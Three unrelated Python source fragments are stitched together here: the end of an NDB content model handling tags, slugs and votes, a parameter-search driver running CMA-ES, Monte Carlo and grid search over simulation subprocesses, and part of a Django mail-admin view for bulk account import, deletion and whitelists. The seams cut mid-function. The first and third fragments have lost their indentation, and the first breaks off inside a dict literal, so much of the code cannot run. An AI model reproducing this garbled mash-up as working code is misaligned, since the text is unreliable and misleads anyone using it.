        # Remove vote data from the lookup. Vote keys were appended last, so
        # the final len(content_list) results are the votes, in order.
        votes = entities[-len(content_list):]
        entities = entities[:-len(content_list)]
    else:
        votes = [None] * len(content_list)
    lookup = {e.key: e for e in entities if e}
    return lookup, votes
def decoration_info(self, include_creator=False, include_related=False, for_account_key=None):
    """Fetch decoration entities for a single piece of content.

    Returns (creator, related_to, has_voted); elements are None/False when not
    requested. The index arithmetic relies on keys being appended in the
    fixed order: creator, related, vote.
    NOTE(review): with no keys at all the third element is None, not False.
    """
    keys = []
    if include_creator:
        keys.append(self.creator)
    if include_related and self.related_to:
        keys.append(self.related_to)
    if for_account_key:
        keys.append(ndb.Key('ContentVote', self.key.id(), parent=for_account_key))
    if not keys:
        return (None, None, None)
    entities = ndb.get_multi(keys)
    return (
        entities[0] if include_creator else None,
        entities[1 if include_creator else 0] if include_related and self.related_to else None,
        entities[-1] is not None if for_account_key else False)
@classmethod
def get_by_youtube_id_async(cls, youtube_id):
    """Async query for content whose YouTube id (current or historical) matches."""
    return cls.query(cls.youtube_id_history == youtube_id).get_async()
@classmethod
def get_sort_index(cls):
    """Baseline sort index: seconds elapsed since the 2017-05-01 epoch."""
    delta = datetime.utcnow() - datetime(2017, 5, 1)
    return int(delta.total_seconds())
@property
def has_been_public(self):
    """True if any tag in the history was a listed (public) tag."""
    return any(not self.is_tag_unlisted(t) for t in self.tags_history)
@property
def is_public(self):
    """True if any current tag is a listed (public) tag."""
    return any(not self.is_tag_unlisted(t) for t in self.tags)
@classmethod
def is_tag_restricted(cls, tag):
    """True if `tag` may only be set internally (multi-word or configured restricted)."""
    tag = cls.parse_tag(tag, allow_restricted=True)
    if not tag:
        return False
    return ' ' in tag or tag in config.RESTRICTED_TAGS
@classmethod
def is_tag_unlisted(cls, tag):
    """True if `tag` does not make content publicly listed."""
    tag = cls.parse_tag(tag, allow_restricted=True)
    if not tag:
        return False
    return ' ' in tag or tag in config.UNLISTED_TAGS
@classmethod
def make_slug(cls, value):
    """Build a URL slug: lowercase alphanumerics, dashes, <=50 chars, random suffix.

    NOTE(review): `random` here is a project module providing base62(), not
    the stdlib random module.
    """
    if not isinstance(value, basestring):
        raise TypeError('Expected string')
    value = re.sub(r'[^a-z0-9]+', ' ', value.lower())
    value = re.sub(r'\s+', '-', value.strip())
    if len(value) > 50:
        value = value[:46]
    if not value.endswith('-'):
        value += '-'
    value += random.base62(3)
    return value
@classmethod
def new(cls, allow_restricted_tags=False, tags=None, **kwargs):
    """Create (but do not put) a new Content entity.

    `created` and `sort_index` default to now; a slug is auto-assigned when
    the new content is immediately public.
    """
    # BUG FIX: `tags=[]` was a shared mutable default argument; use a None
    # sentinel instead (behavior for callers is unchanged).
    if tags is None:
        tags = []
    if 'created' not in kwargs:
        kwargs['created'] = datetime.utcnow()
    if 'sort_index' not in kwargs:
        kwargs['sort_index'] = cls.get_sort_index()
    content = cls()
    for name, value in kwargs.iteritems():
        setattr(content, name, value)
    content.set_tags(tags, allow_restricted=allow_restricted_tags)
    if 'slug' not in kwargs and content.is_public:
        # Auto-set slug if content is public.
        content.slug = content.slug_from_video_url()
    return content
@classmethod
def parse_tag(cls, tag_string, allow_restricted=False):
    """Parse a string expected to contain exactly one tag; otherwise None."""
    tags = cls.parse_tags(tag_string, allow_restricted=allow_restricted)
    if len(tags) != 1:
        return None
    # Python 2 iterator protocol (.next()).
    return iter(tags).next()
@classmethod
def parse_tags(cls, tags_string, allow_restricted=False, separator=','):
    """Split a separated tag string into a set of normalized, allowed tags."""
    tag_strings = [t.strip(' #').lower() for t in tags_string.split(separator)]
    return {t for t in tag_strings if t and (allow_restricted or not cls.is_tag_restricted(t))}
def public(self, version=None, **kwargs):
data = {
'id': self.key.id(),
'created': self.created,
'duration': self.duration,
'original_url': self.original_url,
'tags': self.visible_tags,
'thumb_url': self.thumb_url,
'title': | |
<reponame>alexeyche/dnn_old
#!/usr/bin/env python
import numpy as np
import sys
import argparse
import logging
import os
import json
from os.path import join as pj
from StringIO import StringIO as sstream
import subprocess as sub
import uuid
import time
from collections import OrderedDict
import multiprocessing
import pickle
import random
import shutil
import re
import lib.cma as cma
import lib.env as env
from lib.util import read_json
from lib.util import make_dir
from lib.util import parse_attrs
from lib.util import add_coloring_to_emit_ansi
from lib.evolve_state import State
from run_sim import DnnSim
# Root logger setup: everything at DEBUG and above goes to stderr with
# ANSI-colored output.
logFormatter = logging.Formatter("%(asctime)s [%(levelname)s] %(message)-100s")
rootLogger = logging.getLogger()
rootLogger.setLevel(logging.DEBUG)
consoleHandler = logging.StreamHandler(sys.stderr)
# Wrap emit() so log records are colorized by level.
consoleHandler.emit = add_coloring_to_emit_ansi(consoleHandler.emit)
consoleHandler.setFormatter(logFormatter)
rootLogger.addHandler(consoleHandler)
class GlobalConfig(object):
    """Process-wide settings shared by all optimization algorithms."""
    Epochs = 1
    # Extra command line options forwarded to run_sim.py.
    AddOptions = []
    # Maximum number of concurrent simulation subprocesses.
    Jobs = 8
    # Fitness value reported for failed runs.
    BadValue = 1.0
    # --jobs value passed to each individual simulation.
    SimJobs = 1
    ConstFilename = DnnSim.CONST_JSON
    VarSpecsFile = pj(os.path.realpath(os.path.dirname(__file__)), "var_specs.json")
    # When True, runs are replaced by a cheap "sleep && echo" stub.
    Mock = False
    # NOTE(review): "Calcutations" is a typo, but the name is referenced elsewhere.
    NumberOfCalcutationsUpperBound = 50000
    RUN_SIM_PY = pj(os.path.realpath(os.path.dirname(__file__)), "run_sim.py")
class Distribution(object):
    """Factory for distribution descriptors embedded in the constants JSON."""
    @staticmethod
    def parse_distribution(s, val=None):
        """Parse a distribution spec string such as "Exp(0.5)".

        Returns an ExpDistribution (rate overridden by `val` when given), or
        None when `s` is not a string or does not match a known spec.
        """
        if isinstance(s, basestring):
            m = re.match("Exp\((.*?)\)", s)
            if m:
                return ExpDistribution(float(m.group(1)) if val is None else val)
        return None
class ExpDistribution(object):
    """Exponential distribution descriptor holding a single rate parameter."""
    def __init__(self, r):
        self.rate = r
    def __getitem__(self, idx):
        # The only addressable parameter is the rate, at index 0.
        assert idx == 0
        return self.rate
    def __str__(self):
        return "Exp(%s)" % (self.rate,)
    # repr intentionally matches str for readable logging of spec strings.
    __repr__ = __str__
def scale_to(x, min, max, a, b):
    """Linearly map `x` from the interval [min, max] onto [a, b].

    Note: `min`/`max` shadow the builtins, but the parameter names are part of
    the established signature and are kept.
    """
    delta = x - min
    return ((b - a) * delta / (max - min)) + a
def proc_element(d, p):
    """Validate that key/index `p` is addressable in container `d`.

    Returns `d` itself for dicts and lists (after checking `p` exists), or a
    parsed Distribution when `d` is a distribution spec string.
    NOTE(review): for dicts, a stored null value is indistinguishable from a
    missing key here (`d.get(p) is None`).
    """
    if isinstance(d, dict):
        if d.get(p) is None:
            raise Exception("Can't find key {} in constants".format(p))
        return d
    elif isinstance(d, list):
        if len(d)<=p:
            raise Exception("Can't find key {} in constants".format(p))
        return d
    elif isinstance(d, basestring):
        # A string leaf may encode a distribution, e.g. "Exp(0.5)".
        return Distribution.parse_distribution(d)
    else:
        raise Exception("Got strange type in constants: {}".format(type(d)))
def set_value_in_path(d, path, v):
    """Walk `path` (list of keys/indices) into `d` and set the leaf to `v`.

    Distribution-valued leaves keep their form: `v` replaces the
    distribution's parameter and the string spec is re-written.
    """
    p = path[0]
    d = proc_element(d, p)
    if isinstance(d[p], dict) or isinstance(d[p], list):
        return set_value_in_path(d[p], path[1:], v)
    else:
        distr = Distribution.parse_distribution(d[p], v)
        if distr:
            d[p] = str(distr)
        else:
            d[p] = v
def get_value_in_path(d, path):
    """Walk `path` into `d` and return the leaf value.

    For distribution-valued leaves the walk continues into the parsed
    distribution object (e.g. a path ending in 0 returns the Exp rate).
    """
    p = path[0]
    d = proc_element(d, p)
    if isinstance(d[p], dict) or isinstance(d[p], list) or Distribution.parse_distribution(d[p]):
        return get_value_in_path(d[p], path[1:])
    else:
        return d[p]
def propagate_deps(const):
    """Recompute global constants that depend on other constants.

    max_weight/mean_weight in the "globals" section are derived from the mean
    of all start_weight values in the connection map.
    """
    conn_map = const["sim_configuration"]["conn_map"]
    weights = [
        conn["start_weight"]
        for connections in conn_map.values()
        for conn in connections
    ]
    mean_start_weight = sum(weights)/len(weights)
    # Cap weights at five times the mean starting weight.
    const["globals"]["max_weight"] = 5 * mean_start_weight
    const["globals"]["mean_weight"] = mean_start_weight
def proc_vars(const, var_specs, vars, min=0.0, max=1.0):
    """Write scaled variable values into `const`; return it as a JSON string.

    Each variable in `vars` is mapped from [min, max] onto the (a, b) range
    given by its spec, then dependent globals are recomputed.
    """
    for k, v in vars.iteritems():
        if k not in var_specs:
            raise Exception("Can't find specs for variable {}".format(k))
        path, (a, b) = var_specs[k]
        new_v = scale_to(v, min, max, a, b)
        set_value_in_path(const, path, new_v)
    propagate_deps(const)
    return json.dumps(const, indent=2)
def get_vars(const, var_specs, vars, min=0.0, max=1.0):
    """Read variable values from `const`, rescaled from (a, b) back to [min, max]."""
    var_values = []
    for k in vars:
        if k not in var_specs:
            raise Exception("Can't find specs for variable {}".format(k))
        path, (a, b) = var_specs[k]
        v = get_value_in_path(const, path)
        scaled_v = scale_to(v, a, b, min, max)
        var_values.append(scaled_v)
    return dict(zip(vars, var_values))
def communicate(p):
    """Wait for subprocess `p`; return its stdout parsed as a float fitness.

    On a nonzero exit code the output is logged and GlobalConfig.BadValue is
    returned instead.
    """
    stdout, stderr = p.communicate()
    if p.returncode == 0:
        return float(stdout.strip())
    logging.error("process failed:")
    if stdout:
        logging.error("\n\t"+stdout)
    if stderr:
        logging.error("\n\t"+stderr)
    return GlobalConfig.BadValue
def runner(x, vars, working_dir, wait=False, id=None, min=0.0, max=1.0):
    """Launch a single simulation evaluating variable values `x`.

    Creates a unique working sub-directory, writes a constants file with the
    rescaled variable values, and spawns run_sim.py.

    :param x: raw variable values, each in [min, max]
    :param vars: variable names, parallel to `x`
    :param working_dir: parent directory for this run's sub-directory
    :param wait: block until completion and return the fitness float;
                 otherwise return the Popen handle
    :param id: run identifier (used as directory name); a fresh uuid when None
    :param min: lower bound of the raw variable scale
    :param max: upper bound of the raw variable scale
    """
    if id is None:
        id = uuid.uuid1()
    working_dir = pj(working_dir, str(id))
    if os.path.exists(working_dir):
        raise Exception("Working dir is already exists {}!".format(working_dir))
    make_dir(working_dir)
    const_json = pj(working_dir, os.path.basename(GlobalConfig.ConstFilename))
    specs = read_json(GlobalConfig.VarSpecsFile)
    with open(const_json, "w") as fptr:
        fptr.write(
            proc_vars(
                const = read_json(GlobalConfig.ConstFilename)
                , var_specs = specs
                , vars = dict(zip(vars, x))
                , min = min
                , max = max
            )
        )
    cmd = [
        # BUG FIX: RUN_SIM_PY is defined on GlobalConfig; the bare name used
        # previously raised a NameError at runtime.
        GlobalConfig.RUN_SIM_PY
        , "--working-dir", working_dir
        , "--epochs", str(GlobalConfig.Epochs)
        , "--const", const_json
        , "--slave"
        , "--jobs", str(GlobalConfig.SimJobs)
    ] + GlobalConfig.AddOptions
    for v in vars:
        # `value_range` renamed from `range` to avoid shadowing the builtin.
        path, value_range = specs[v]
        if "prepare_data" in path:
            # At least one variable affects data preparation; regenerate it.
            cmd += ["--prepare-data"]
            break
    logging.info(" ".join(cmd))
    if GlobalConfig.Mock:
        # Mock mode: cheap stub process reporting a fixed fitness of 1.0.
        p = sub.Popen("sleep 1.0 && echo 1.0", shell=True, stdout=sub.PIPE, stderr=sub.PIPE)
    else:
        p = sub.Popen(cmd, stdout=sub.PIPE, stderr=sub.PIPE)
    if wait:
        return communicate(p)
    return p
def lhs_sample(n, rng):
    """Latin hypercube sample of `n` points in (0, 1].

    Each of the n equal-width strata contains exactly one point: stratum order
    is shuffled via the global `random` module, while the within-stratum
    offset is drawn from `rng`.
    """
    strata = np.asarray(random.sample(range(1, n + 1), n))
    return (strata - rng.random_sample(n)) / float(n)
class Algo(object):
    """Base class for optimization drivers: working-directory handling,
    subprocess pool management, and state checkpointing.
    """
    def create_workdir(self, wd):
        """Create (or resume from) working directory `wd`.

        Returns (wd, state); `state` is a previously saved State when the
        user chooses to continue an existing run, else None.
        """
        state = None
        if os.path.exists(wd):
            while True:
                # NOTE(review): raw_input is Python 2 only.
                ans = raw_input("%s already exists. Continue learning? (y/n): " % (wd))
                if ans in ["Y","y"]:
                    state = State.read_from_dir(wd)
                    break
                elif ans in ["N", "n"]:
                    logging.warning("Deleting {}".format(wd))
                    shutil.rmtree(wd)
                    make_dir(wd)
                    break
                else:
                    logging.warning("incomprehensible answer")
        else:
            make_dir(wd)
        return wd, state
    @staticmethod
    def wait_pool(pool, ans_list):
        """Block until at least one process in `pool` finishes.

        The first finished process found is collected into `ans_list` as an
        (id, fitness) pair and removed from `pool`; returning immediately
        avoids mutating `pool` while iterating it. Polls twice per second.
        """
        while True:
            for pi, (id, p) in enumerate(pool):
                if not p.poll() is None:
                    ans_list.append( (id, communicate(p)) )
                    del pool[pi]
                    return
            time.sleep(0.5)
    @staticmethod
    def dump_state(wd, state, asks, tells, pool):
        """Fold finished runs into `state`, persist it, and prune bookkeeping.

        `asks` holds (id, x) pairs of submitted points, `tells` (id, fitness)
        pairs of finished ones. Finished pairs are appended to the state in
        id order and removed from asks/tells/pool; the pruned collections are
        returned as (state, asks, tells, pool).
        """
        asks_d = dict(asks)
        X = list()
        tells_current = list()
        finished_ids = dict()
        for finished_id, tell in [ (finished_id, tell) for finished_id, tell in sorted(tells, key=lambda x: x[0]) ]:
            X.append(asks_d[finished_id])
            del asks_d[finished_id]
            tells_current.append(tell)
            finished_ids[finished_id] = True
        state.add_val(X, tells_current)
        state.dump(wd)
        pool = [ (idp, p) for idp, p in pool if idp not in finished_ids ]
        tells = [ (idp, t) for idp, t in tells if idp not in finished_ids ]
        return state, asks_d.items(), tells, pool
class MonteCarlo(Algo):
    """Latin hypercube Monte Carlo search over the variable space."""
    def __init__(self, attrs):
        self.number = int(attrs.get("number", 1000))
        self.seed = attrs.get("seed", random.randint(0, 65535))
        self.max_bound = attrs.get("max_bound", 1)
        self.min_bound = attrs.get("min_bound", 0)
    def __call__(self, vars, tag=None):
        """Evaluate `self.number` Latin-hypercube-sampled points, resumable."""
        wd, state = self.create_workdir(
            pj(
                env.runs_dir
                , "mc" if tag is None else tag
            )
        )
        if state is None:
            state = State(self.seed)
            state.dump(wd)
        rng = np.random.RandomState(state.seed)
        asks, tells, pool = [], [], []
        # Resume: skip the runs already recorded in the saved state.
        run_ids = range(sum([ len(v[1]) for v in state.vals ]), self.number)
        dim_size = len(vars)
        X = np.zeros((len(run_ids), dim_size))
        for dim_idx in xrange(dim_size):
            # BUG FIX: scale the unit LHS sample into [min_bound, max_bound].
            # The previous expression (min + max*sample) produced values in
            # [min_bound, min_bound + max_bound] whenever min_bound != 0.
            X[:,dim_idx] = self.min_bound + (self.max_bound - self.min_bound)*lhs_sample(len(run_ids), rng)
        for x_id, run_id in enumerate(run_ids):
            x = X[x_id, :]
            pool.append( (run_id, runner(x, vars, wd, wait=False, id=run_id, min=self.min_bound, max=self.max_bound)) )
            asks.append( (run_id, x) )
            if len(pool)>=GlobalConfig.Jobs:
                Algo.wait_pool(pool, tells)
                state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
        # Drain any still-running processes before finishing.
        while len(pool)>0:
            Algo.wait_pool(pool, tells)
            state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
class CmaEs(Algo):
    """CMA-ES optimization driver built on the pycma ask/tell interface."""
    def __init__(self, attrs):
        self.max_bound = attrs.get("max_bound", 10)
        self.min_bound = attrs.get("min_bound", 0)
        self.popsize = attrs.get("popsize", 15)
        self.sigma = attrs.get("sigma", 2)
        self.seed = attrs.get("seed", random.randint(0, 65535))
    def __call__(self, vars, tag=None):
        """Run CMA-ES generations until the strategy reports convergence."""
        wd, state = self.create_workdir(
            pj(
                env.runs_dir
                , "cma_es" if tag is None else tag
            )
        )
        if state is None:
            state = State(self.seed)
            state.dump(wd)
        rng = np.random.RandomState(state.seed)
        # BUG FIX: draw the start point uniformly from [min_bound, max_bound];
        # the previous expression (min + max*sample) overshot when min_bound != 0.
        start_vals = self.min_bound + (self.max_bound - self.min_bound)*rng.random_sample(len(vars))
        es = cma.CMAEvolutionStrategy(
            start_vals
            , self.sigma
            , {
                'bounds' : [
                    self.min_bound
                    , self.max_bound
                ],
                'popsize' : self.popsize
                , 'seed' : state.seed
            }
        )
        # Replay saved generations to restore the strategy's internal state.
        # NOTE(review): the stored X is ignored and fresh ask() points are told
        # the old fitness values; with a fixed seed this reproduces the
        # original asks deterministically — confirm before changing.
        for X, tells in state.vals:
            X = es.ask()
            es.tell(X, tells)
        id = sum([ len(v[1]) for v in state.vals ])
        while not es.stop():
            X = es.ask()
            asks, tells, pool = [], [], []
            for Xi in X:
                p = runner(Xi, vars, wd, wait=False, id=id, min=self.min_bound, max=self.max_bound)
                pool.append( (id, p) )
                # BUG FIX: asks was never populated, so Algo.dump_state raised
                # a KeyError (asks_d[finished_id]) as soon as a run finished.
                asks.append( (id, Xi) )
                id+=1
                if len(pool)>=GlobalConfig.Jobs:
                    Algo.wait_pool(pool, tells)
                    state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
            while len(pool)>0:
                Algo.wait_pool(pool, tells)
                state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
            # Feed fitness values back to CMA-ES in ask order (sorted by run id).
            tells = [ out for _, out in sorted(tells, key=lambda x: x[0]) ]
            es.tell(X, tells)
            es.disp()
class GridSearch(Algo):
    """Exhaustive evaluation over a regular grid of variable values.

    NOTE(review): unlike the other algorithms there is no final drain loop
    waiting for the last `pool` processes after submission ends, so their
    results may never be recorded — confirm whether this is truncated code.
    """
    def __init__(self, attrs):
        self.max_bound = attrs.get("max_bound", 1)
        self.min_bound = attrs.get("min_bound", 0)
        self.step = float(attrs.get("step", 0.1))
        # Optional fixed coordinates; only non_freeze_vars move on the grid.
        self.freeze_point = attrs.get("freeze_point", None)
        self.non_freeze_vars = attrs.get("non_freeze_vars", None)
    def __call__(self, vars, tag=None):
        """Evaluate every grid point (resumable via the saved state)."""
        wd, state = self.create_workdir(
            pj(
                env.runs_dir
                , "grid_search" if tag is None else tag
            )
        )
        if state is None:
            state = State(0) # doesn't matter
            state.dump(wd)
        if self.freeze_point:
            # Space-separated float list, e.g. "0.1 0.5 0.9".
            self.freeze_point = [ float(p) for p in self.freeze_point.split(" ") if p.strip() ]
            if self.non_freeze_vars is None:
                raise Exception("Got freeze point but freeze variables are not defined")
        if self.non_freeze_vars:
            self.non_freeze_vars = [ v.strip() for v in self.non_freeze_vars.split(" ") if v.strip() ]
        else:
            self.non_freeze_vars = vars
        dim_of_problem = len(self.non_freeze_vars)
        # NOTE(review): this is a float; numpy >= 1.12 requires an integer
        # num= for np.linspace — cast with int() when upgrading numpy.
        number_of_dim_slice = (self.max_bound - self.min_bound)/self.step
        axis_slices = [ np.linspace(self.min_bound, self.max_bound, num=number_of_dim_slice) for _ in xrange(dim_of_problem) ]
        if len(axis_slices) == 1:
            points = axis_slices[0].reshape(1, -1).T
        else:
            # Cartesian product of the per-axis slices, one row per grid point.
            points = np.vstack(np.meshgrid(*axis_slices)).reshape(dim_of_problem, -1).T
        number_of_steps = len(points)
        if number_of_steps > GlobalConfig.NumberOfCalcutationsUpperBound:
            raise Exception("There are a lot of calculations ({}). Reconsider your setup".format(number_of_steps))
        # Resume support: skip points already evaluated in the saved state.
        nsteps_done = sum([ len(v[1]) for v in state.vals ])
        points = points[nsteps_done:]
        asks, tells, pool = [], [], []
        for id, point in enumerate(points):
            if self.freeze_point:
                # Start from the frozen coordinates and overwrite the moving axes.
                x = list(self.freeze_point)
                for vi, v in enumerate(self.non_freeze_vars):
                    try:
                        var_idx = vars.index(v)
                    except ValueError:
                        raise Exception("Can't find non freeze var {} in specification".format(v))
                    x[var_idx] = point[vi]
            else:
                x = point
            pool.append( (id, runner(x, vars, wd, wait=False, id=id, min=self.min_bound, max=self.max_bound)) )
            asks.append( (id, x) )
            if len(pool)>=GlobalConfig.Jobs:
                Algo.wait_pool(pool, tells)
                state, asks, tells, pool = Algo.dump_state(wd, state, asks, tells, pool)
| |
'xlsx'):
import xlrd
content = fobj.read()
workbook = xlrd.open_workbook(filename=None, file_contents=content)
table = workbook.sheets()[0]
for line in xrange(table.nrows):
#前x行跳过
if line in (0,):
continue
lines.append( table.row_values(line) )
idx = 0
if len(lines)>500:
messages.add_message(request, messages.ERROR, _(u"单次只能导入500行数据,请分批次导入。"))
return render(request, template_name=template_name, context={
'domain': domain,
'failures': failures,
'success': success
})
for elem in lines:
# 用户名 真实名称 所属部门 职位 工号 手机号码 电话号码 密码 邮箱容量 网盘容量 排序权重 QQ号码 出生日期 密码
fields_list = ['name', 'realname', 'dept', 'position', 'eenumber', 'tel_mobile', 'tel_work',
'quota_mailbox', 'quota_netdisk', 'showorder', 'im_qq', 'birthday', '<PASSWORD>']
data = {}
for i, k in enumerate(fields_list):
try:
v = elem[i]
if isinstance(v, str) or isinstance(v, unicode):
v = v.strip()
else:
v = v
#excel保存日期为数字的
if fext in ('xls', 'xlsx') and k == "birthday" and v:
excel_date = int(v)
dt = datetime.datetime.fromordinal(datetime.datetime(1900, 1, 1).toordinal() + excel_date - 2)
v = dt.strftime('%Y-%m-%d')
if k == "im_qq" and v:
v = int(float(v))
data[k] = v
except Exception,err:
print "err: ",err
data[k] = ''
# 检测用户名是否存在
name = data.get('name', '')
try:
mailbox_obj = Mailbox.objects.get(name=name, domain=domain)
except:
failures.append([_(u'用户不存在'), line])
continue
try:
mailboxuser_obj = MailboxUser.objects.get(mailbox_id=mailbox_obj.id)
except:
failures.append([_(u'用户帐号不存在'), line])
continue
mailbox_size_using = mailbox_obj.quota_mailbox
netdisk_size_using = mailbox_obj.quota_netdisk
quota_mailbox = data.get('quota_mailbox', '')
quota_netdisk = data.get('quota_netdisk', '')
try:
quota_mailbox = int(quota_mailbox)
except:
quota_mailbox = mailbox_obj.quota_mailbox
try:
quota_netdisk = int(quota_netdisk)
except:
quota_netdisk = mailbox_obj.quota_netdisk
data["quota_mailbox"] = quota_mailbox
data["quota_netdisk"] = quota_netdisk
mailbox_data = mailbox_obj.__dict__
mailbox_data.update(data)
_v = mailbox_data.get('pwd_days_time', '')
if isinstance(_v, six.integer_types):
mailbox_data['pwd_days_time'] = int(time.time())
mailboxuser_data = mailboxuser_obj.__dict__
mailboxuser_data.update(data)
form = MailboxForm(domain, mailbox_data, instance=mailbox_obj)
#导入的不判断密码
form.is_check_passwd = False
user_form = MailboxUserForm(domain, mailboxuser_data, instance=mailboxuser_obj)
if form.is_valid() and user_form.is_valid():
mailbox_size = form.cleaned_data.get('quota_mailbox')
netdisk_size = form.cleaned_data.get('quota_netdisk')
try:
checker.simple_check(domain_id, mailbox_size, netdisk_size, mailbox_size_using=mailbox_size_using,
netdisk_size_using=netdisk_size_using, count=0)
except Exception, e:
failures.append([e.message, elem])
else:
obj = form.save()
user_form.save(obj.id)
# 部门处理
dept = data.get('dept', '')
if dept:
parent_id = -1
for d in dept.split('-'):
dept_obj, __ = Department.objects.get_or_create(domain=domain, parent_id=parent_id, title=d)
parent_id = dept_obj.id
if parent_id > 0:
DepartmentMember.objects.filter(domain=domain, mailbox_id=mailbox_obj.id).delete()
DepartmentMember.objects.create(
domain_id=domain.id,
mailbox_id=mailbox_obj.id,
dept_id=parent_id,
position=u"",
)
position = data.get('position', '')
if position:
DepartmentMember.objects.filter(domain=domain, mailbox_id=mailbox_obj.id).update(position=position)
success += 1
else:
failures.append([u'{}{}'.format(form.errors, user_form.errors), elem])
idx += 1
return render(request, template_name=template_name, context={
'domain': domain,
'failures': failures,
'success': success
})
@licence_required
def delete_account(request, template_name='mailbox/delete_account.html'):
    """Batch-delete mailboxes listed (one per line) in POST['mailboxs'].

    Bare local parts are qualified with the current session domain.
    Special admin accounts and — for non-superusers — superuser accounts
    are refused. Deletion is soft: rows are flagged disabled and the real
    removal is delegated to the task queue / proxy log consumers.
    """
    domain_id = get_domainid_bysession(request)
    domain = Domain.objects.get(id=domain_id)
    if request.method == 'POST':
        mailboxs = request.POST.get('mailboxs', '')
        mailbox_list = []
        for m in mailboxs.split('\n'):
            m = m.strip()
            if not m:
                continue
            # BUG FIX: this line was corrupted; qualify a bare local part
            # with the current domain to form a full address.
            if m.find('@') == -1:
                m = '{}@{}'.format(m, domain.domain)
            mailbox_list.append(m)
        mailboxs = Mailbox.objects.filter(username__in=mailbox_list)
        if mailboxs.filter(name__in=LICENCE_EXCLUDE_LIST).count() > 0:
            messages.add_message(request, messages.ERROR, _(u'禁止删除特殊管理帐号system'))
        elif not request.user.is_superuser and mailboxs.filter(is_superuser=True).count() > 0:
            messages.add_message(request, messages.ERROR, _(u'当前帐号没有删除超级管理员的权限'))
        else:
            ids = list(mailboxs.values_list('id', flat=True))
            ids = ','.join([str(id) for id in ids])
            # Soft delete: mark disabled, then queue the asynchronous removal.
            mailboxs.update(disabled='1')
            task_queue = TaskQueue()
            task_queue.add_task_to_queue('delete', {'type': 'mailbox', 'target_ids': ids})
            ProxyRedisLog.objects.create(data=json.dumps({"protocol": "core_mailbox", "data": {"del": ids}}),
                                         exec_type='delete', protocol='core_mailbox', save_status=1)
            messages.add_message(request, messages.SUCCESS, '{}{}'.format(_(u'已成功删除邮箱:'), ', '.join(mailbox_list)))
    return render(request, template_name=template_name, context={
        'domain': domain
    })
@licence_required
def backup_account(request, template_name='mailbox/backup_account.html'):
    """Render the mailbox backup page for the current session domain."""
    domain = Domain.objects.get(id=get_domainid_bysession(request))
    # NOTE(review): the 'bakcup' query parameter is read but never acted on;
    # this branch is a stub (and the key looks like a typo for 'backup') —
    # confirm intent before changing the parameter name.
    if request.GET.get('bakcup', ''):
        pass
    return render(request, template_name=template_name, context={'domain': domain})
@licence_required
def edit_account(request, id, template_name='mailbox/edit_account.html'):
    """Render the account-edit page: mailbox forms plus all related records
    (groups, departments, mail lists, related emails) for one mailbox."""
    domain_id = get_domainid_bysession(request)
    domain = Domain.objects.get(id=domain_id)
    mailbox = Mailbox.objects.get(id=id)
    mailbox_user = mailbox.mailboxuser
    context = {
        'obj': mailbox,
        'form': MailboxForm(domain, instance=mailbox),
        'user_form': MailboxUserForm(domain, instance=mailbox_user),
        'user': mailbox_user,
        'groups': CoreGroup.objects.filter(domain_id=domain_id),
        'group_members': CoreGroupMember.objects.filter(mailbox=mailbox),
        "dept_list": json.dumps(get_dept_list_sort(get_user_child_departments_kv(request, domain_id))),
        'depts': DepartmentMember.objects.filter(mailbox_id=mailbox.id),
        'maillists': ExtList.objects.filter(listtype='general', domain_id=domain_id),
        'maillist_member': ExtListMember.objects.filter(address=mailbox.username),
        'relate_email': WmRelateEmail.objects.filter(mailbox_id=mailbox.id),
        'domains': Domain.objects.all(),
        "mailbox_id": mailbox.id,
    }
    return render(request, template_name=template_name, context=context)
@licence_required
def mailbox_limit_whitelist(request):
    """Create/update/delete per-mailbox send/receive whitelist entries.

    Existing entries arrive in POST as keys shaped "{type}_{mailbox}_{field}"
    (field in: id / delete / disabled); new addresses arrive in
    "new_mailbox" and the "|"-separated "new_mailbox_list".
    Returns a JSON status document.
    """
    def getPostMailbox(key):
        # Extract the mailbox from a key shaped "entry_{{ mailbox }}_id":
        # drop the leading prefix and the trailing field flag; the mailbox
        # itself may contain "_", hence the re-join.
        l = key.split("_")
        l.pop(0)
        flag = l.pop(-1)
        mailbox = "_".join(l)
        return mailbox
    def setPostMailboxData(mailbox, key, value):
        # Accumulate per-mailbox fields into the shared mailboxDict.
        mailboxDict.setdefault(mailbox, {})
        mailboxDict[mailbox][key] = value
    def saveNewEmail(mailbox):
        # Skip addresses that already have an (old) entry in this request.
        if mailbox in mailboxDict:
            return
        obj = CoreWhitelist.objects.create(type="fix_{}".format(type), domain_id=domain_id, mailbox_id=mailbox_id, email=mailbox)
        obj.save()
    def saveOldEmail():
        # Apply delete/disabled changes to entries that carry a DB id.
        for mailbox, data in mailboxDict.items():
            data = mailboxDict[mailbox]
            entry_id = data.get("id", "")
            if not entry_id:
                continue
            obj = CoreWhitelist.objects.filter(id=entry_id).first()
            if not obj:
                continue
            if data.get("delete", u"-1") == u"1":
                obj.delete()
            else:
                obj.disabled = data.get("disabled", "-1")
                obj.save()
    def saveWhitelist():
        # First create the newly-added addresses, then update old entries.
        if newMailbox:
            saveNewEmail( newMailbox )
        for mailbox in newMailboxList:
            saveNewEmail( mailbox )
        saveOldEmail()
    #enddef
    domain_id = get_domainid_bysession(request)
    mailboxDict = {}
    newMailboxList = []
    data = request.POST
    if not data:
        return
    # NOTE(review): "type" shadows the builtin; it selects the whitelist
    # direction (default u"send") and is embedded in the key prefix.
    type = data.get("type", u"send")
    mailbox_id = data.get("id", 0)
    newMailbox = data.get("new_mailbox", u"")
    newMailboxList = data.get("new_mailbox_list", u"")
    # NOTE(review): this self-assignment is a no-op left in place.
    if newMailbox:
        newMailbox = newMailbox
    boxList = newMailboxList.split("|")
    boxList = [box for box in boxList if box.strip()]
    if boxList:
        newMailboxList = boxList
    # Collect id/delete fields for every key with the "{type}_" prefix.
    for k,v in data.items():
        if k.startswith("{}_".format(type)):
            if k.endswith("_id"):
                mailbox = getPostMailbox(k)
                setPostMailboxData(mailbox, "id", v)
            elif k.endswith("_delete"):
                mailbox = getPostMailbox(k)
                setPostMailboxData(mailbox, "delete", v)
    # Disabled checkboxes are absent when unchecked, so default to u"1".
    for mailbox in mailboxDict.keys():
        isDisabled = data.get(u"{}_{}_disabled".format(type, mailbox), u"1")
        setPostMailboxData(mailbox, "disabled", isDisabled)
    data = {
        "status" : "OK",
        "message" : "Success",
    }
    if request.method == 'POST':
